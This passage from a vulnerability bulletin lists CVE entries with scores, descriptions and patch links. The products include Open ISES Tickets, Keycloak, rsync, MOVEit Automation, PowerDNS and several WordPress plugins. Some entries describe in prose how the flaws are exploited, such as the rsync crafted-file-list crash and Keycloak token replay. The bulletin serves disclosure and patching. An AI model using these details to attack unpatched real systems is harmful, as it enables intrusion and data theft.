https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ticketsmdb-import-php-multiple-parameters
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 embeds a hardcoded WhitePages reverse-phone API key in wp1.php that is committed to the public source repository. Any actor with read access to the source tree can extract the key and use it to make third-party API calls billed to or rate-limited against the original owner’s WhitePages account. 2026-05-21 5.3 CVE-2026-48243 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-whitepages-api-key-in-wp1-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in settings.inc.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner’s Google Cloud project. 2026-05-21 5.3 CVE-2026-48244 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-settings-inc-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in tables.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner’s Google Cloud project. 2026-05-21 5.3 CVE-2026-48245 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-tables-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 disables TLS certificate verification in ajax/reports.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for Google Maps Directions API lookups during incident report generation. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. 2026-05-21 5.9 CVE-2026-48246 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-ajax-reports-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/functions.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing general-purpose outbound HTTPS requests from the shared helper functions. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. 2026-05-21 5.9 CVE-2026-48247 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-functions-inc-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests during the login/authentication flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. 2026-05-21 5.9 CVE-2026-48248 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-login-inc-php
 
Open ISES–Tickets Open ISES Tickets before 3.44.2 disables TLS certificate verification in rm/incs/mobile_login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests during the mobile (RouteMate) login flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. 2026-05-21 5.9 CVE-2026-48249 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-rm-incs-mobile-login-inc-php
 
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a local attacker to execute arbitrary code. 2026-05-19 6.5 CVE-2026-28733 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md
 
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a local attacker to cause an information leak. 2026-05-19 5.5 CVE-2026-25850 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md
 
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a local attacker to cause an information leak. 2026-05-19 5.5 CVE-2026-27766 https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single_unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35007 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-unit-php-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35008 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-php-ticket-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_note.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35009 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-note-php-ticket-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_JF.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35010 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-jf-php-ticket-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in opena.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_call GET parameter directly into page output. Attackers can craft a malicious URL containing a JavaScript payload in the frm_call parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35011 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-opena-php-frm-call-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_facnote.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35012 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-facnote-php-ticket-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in street_view.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through the thelat and thelng GET parameters directly into JavaScript variable assignments. Attackers can craft a malicious URL containing a JavaScript payload in either parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35013 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-street-view-php-thelat-and-thelng-parameters
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35014 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-nm-php-ticket-id-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in do_unit_mail.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the the_ticket GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the the_ticket parameter that executes in the victim’s browser when the URL is visited. 2026-05-20 4.6 CVE-2026-35015 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-do-unit-mail-php-the-ticket-parameter
 
openises–tickets Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in search.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_query POST parameter directly into an HTML input field VALUE attribute. Attackers can craft a malicious request containing a JavaScript payload in the frm_query parameter that executes in the victim’s browser when submitted. 2026-05-20 4.6 CVE-2026-35016 https://github.com/openises/tickets/releases/tag/v3.44.2
https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff
https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-search-php-frm-query-parameter
 
opensourcepos–Open Source Point of Sale A vulnerability was detected in opensourcepos Open Source Point of Sale up to 3.4.2. This issue affects the function getPicThumb of the file app/Controllers/Items.php. The manipulation of the argument pic_filename results in path traversal. The attack may be launched remotely. The patch is identified as def0c27a0e252668df8d942fc31e16d1edfd7323. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure. 2026-05-18 4.3 CVE-2026-8802 VDB-364435 | opensourcepos Open Source Point of Sale Items.php getPicThumb path traversal
VDB-364435 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #802559 | opensourcepos Open Source Point of Sale 3.4.1 Path Traversal
https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xq63-3v4g-39r5
https://github.com/opensourcepos/opensourcepos/pull/4545
https://github.com/opensourcepos/opensourcepos/commit/def0c27a0e252668df8d942fc31e16d1edfd7323
 
owencutajar–SponsorMe The SponsorMe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The PHP_SELF value is reflected in two separate locations within the vulnerable function – a form action attribute and an anchor href attribute – both of which can be exploited by appending a crafted payload to the wp-admin/admin.php URL path. 2026-05-20 6.1 CVE-2026-8626 https://www.wordfence.com/threat-intel/vulnerabilities/id/7df7f541-b8aa-46fa-bfca-b333beea27f9?source=cve
https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L440
https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L475
 
pftool–Alfie Feed Plugin The Alfie – Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the ‘delete’ GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-22 4.3 CVE-2026-4070 https://www.wordfence.com/threat-intel/vulnerabilities/id/af36719a-8f7d-46dc-a697-cfcbb08e45e2?source=cve
https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L60
https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L60
https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L58
https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L58
 
PowerDNS–Authoritative Insufficient Validation of Names During AXFR 2026-05-21 6.8 CVE-2026-42000 https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html
 
PowerDNS–Authoritative Concurrency and locking defects in GSS-TSIG 2026-05-21 5.9 CVE-2026-42002 https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html
 
PowerDNS–Authoritative Incorrect Behaviour of Views with TCP PROXY Requests 2026-05-21 4.8 CVE-2026-41999 https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html
 
PowerDNS–Authoritative Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail 2026-05-21 4.9 CVE-2026-42396 https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html
 
Progress Software–MOVEit Automation Incorrect default permissions vulnerability in Progress Software MOVEit Automation allows Retrieve Embedded Sensitive Data. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. 2026-05-20 6.5 CVE-2026-8487 https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html
 
Progress Software–MOVEit Automation Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. 2026-05-20 5.9 CVE-2026-8485 https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html
 
Progress Software–MOVEit Automation Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. 2026-05-20 5.3 CVE-2026-8486 https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html
 
Progress Software–MOVEit Automation Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. 2026-05-20 4.3 CVE-2026-8488 https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html
 
QuantumNous–new-api A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-23 6.3 CVE-2026-9305 VDB-365252 | QuantumNous new-api self Endpoint topup.go SearchAllTopUps sql injection
VDB-365252 | CTI Indicators (IOB, IOC, TTP, IOA)
Submit #812192 | QuantumNous new-api [Needs Manual Input] SQL Injection (CWE-89)
Submit #812195 | QuantumNous new-api 0.12.1 Improper Neutralization of Data Query Logic (CWE-943) (Duplicate)
https://gist.github.com/YLChen-007/cf501d0a66c81298b2f97e854f3813db
 
rdbeach–BLOGCHAT Chat System The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-05-20 6.1 CVE-2026-8420 https://www.wordfence.com/threat-intel/vulnerabilities/id/a62186aa-19aa-445b-8fdc-b029bdafd58f?source=cve
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L208
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L208
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L215
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L215
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L222
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L222
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L293
https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L293
 
Red Hat–Red Hat Build of Keycloak A flaw was found in Keycloak. The cross-session verification proof is keyed only by (local userId, idpAlias) and is not bound to the upstream identity that was actually verified, so a second upstream account on the same IdP can consume it and get linked to the victim’s local account. 2026-05-20 6.4 CVE-2026-9087 https://access.redhat.com/security/cve/CVE-2026-9087
RHBZ#2480172
 
Red Hat–Red Hat Build of Keycloak A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak’s OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management. 2026-05-19 5.4 CVE-2026-8922 https://access.redhat.com/security/cve/CVE-2026-8922
RHBZ#2479586
 
Red Hat–Red Hat Build of Keycloak A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential’s parameters, such as public key algorithms, match the realm’s configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods. 2026-05-19 4.3 CVE-2026-8830 https://access.redhat.com/security/cve/CVE-2026-8830
RHBZ#2479565
 
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. This access control vulnerability in Keycloak’s OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials. 2026-05-19 6.5 CVE-2026-37979 RHSA-2026:19596
RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37979
RHBZ#2455328
 
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. This authentication vulnerability allows a remote attacker to replay `ExecuteActionsActionToken` tokens within Keycloak’s WebAuthn (Web Authentication) flow. By intercepting an execute-actions email link, an attacker can register their own authenticator to a victim’s account. This leads to unauthorized enrollment of a hardware-backed credential, enabling persistent account takeover. 2026-05-19 6.8 CVE-2026-37982 RHSA-2026:19596
RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37982
RHBZ#2455329
 
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource’s unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data. 2026-05-19 6.8 CVE-2026-4630 RHSA-2026:19596
RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-4630
RHBZ#2450245
 
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. A low-privilege administrator with the ‘view-clients’ role can exploit this by invoking the ‘evaluate-scopes’ Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API. 2026-05-19 4.9 CVE-2026-37978 RHSA-2026:19596
RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37978
RHBZ#2455327
 
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure. 2026-05-19 4.3 CVE-2026-37981 RHSA-2026:19596
RHSA-2026:19597
https://access.redhat.com/security/cve/CVE-2026-37981
RHBZ#2455326
 
Red Hat–Red Hat Enterprise Linux 10 A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS). 2026-05-20 6.5 CVE-2026-9149 https://access.redhat.com/security/cve/CVE-2026-9149
RHBZ#2460380
https://github.com/openSUSE/libsolv/pull/617
 
Red Hat–Red Hat Enterprise Linux 10 A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv’s Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system. 2026-05-20 6.5 CVE-2026-9150 https://access.redhat.com/security/cve/CVE-2026-9150
RHBZ#2460379
https://github.com/openSUSE/libsolv/pull/616
 
registrationformbuilder–Vedrixa Forms User Registration Form, Signup Form & Drag & Drop Form Builder The Vedrixa Forms – User Registration Form, Signup Form & Drag & Drop Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the structure of any form – adding, removing, or altering fields – by writing attacker-controlled data to the plugin’s FORMS database table. The ‘ajax-nonce’ nonce used by this handler is injected into the public frontend via wp_localize_script(), so any authenticated user who visits a page containing a form shortcode can obtain it without any elevated access. 2026-05-22 4.3 CVE-2026-8692 https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3b8a6c-1c84-4abe-ad4a-02302b04987b?source=cve
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/admin/class-registration-form-builder-admin.php#L866
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/includes/class-registration-form-builder.php#L174
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/public/class-registration-form-builder-public.php#L121
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/admin/class-registration-form-builder-admin.php#L866
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/includes/class-registration-form-builder.php#L174
https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/public/class-registration-form-builder-public.php#L121
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3540543%40vedrixa-forms-registration-builder&new=3540543%40vedrixa-forms-registration-builder&sfp_email=&sfph_mail=
 
Revolution Slider–Slider Revolution The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the ‘get_stream_data()’ function. This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content. 2026-05-20 5.3 CVE-2026-6728 https://www.wordfence.com/threat-intel/vulnerabilities/id/3cd7be2c-9ba9-4d25-8907-610898df5834?source=cve
https://www.sliderrevolution.com/changelog/
 
RsyncProject–rsync Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with ‘use chroot = no’. 2026-05-20 6.3 CVE-2026-43619 https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735
https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls
 
RsyncProject–rsync Rsync version 3.4.2 and prior contain a receiver-side out-of-bounds array read vulnerability in recv_files() in receiver.c that allows a malicious rsync server to crash the rsync client process. Attackers can exploit the vulnerability by setting CF_INC_RECURSE in compatibility flags and sending a specially crafted file list where the first sorted entry is not the leading dot directory, followed by a transfer record with ndx=0 and an iflag word without ITEM_TRANSFER, causing the receiver to read 8 bytes before the allocated pointer array and dereference an invalid pointer at an unmapped address, resulting in a deterministic SIGSEGV crash of the rsync client. 2026-05-20 6.5 CVE-2026-43620 https://github.com/RsyncProject/rsync/security/advisories/GHSA-28pw-r563-rxvm
https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
https://www.vulncheck.com/advisories/rsync-out-of-bounds-array-read-via-recv-files
 
RsyncProject–rsync Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon’s hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN. 2026-05-20 4.8 CVE-2026-43617 https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f
https://github.com/RsyncProject/rsync/releases/tag/v3.4.3
https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution
 
Samsung Open Source–Escargot Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47309 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Escargot Release of invalid pointer or reference vulnerability in Samsung Open Source Escargot allows Buffer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47312 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Escargot Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47313 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Escargot Improper Check for Unusual or Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47315 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Escargot Improper Check or Handling of Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47316 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Escargot Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 5.5 CVE-2026-47317 https://github.com/Samsung/escargot/pull/1565
 
Samsung Open Source–Walrus NULL pointer dereference vulnerability in Samsung Open Source Walrus allows an attacker to cause a denial of service via a crafted WebAssembly module containing deeply nested instructions. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. 2026-05-19 5.5 CVE-2026-47307 https://github.com/Samsung/walrus/pull/409
 
Samsung Open Source–Walrus NULL pointer dereference vulnerability in Samsung Open Source Walrus allows Pointer Manipulation. This issue affects Walrus: f339b8ee4ea701772e8ae640b3d1b12ac02b1ae9. 2026-05-19 5.5 CVE-2026-47308 https://github.com/Samsung/walrus/pull/409
 
shapedplugin–Location Weather WordPress Weather Forecast, AQI, Temperature and Weather Widget The Location Weather plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the `splw_update_block_options()` and `lwp_clean_weather_transients()` functions in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to disable all weather blocks and purge all weather cache transients. The nonce required for these actions is exposed to all authenticated users via `wp_localize_script()` on the `init` hook. 2026-05-22 4.3 CVE-2026-7249 https://www.wordfence.com/threat-intel/vulnerabilities/id/d472011d-1623-4791-9d56-715d90fe0469?source=cve
https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L256
https://plugins.trac.wordpress.org/browser/location-weather/tags/3.0.2/includes/Admin/AdminDashboard/Splw_Blocks_Page_Wrapper.php#L331
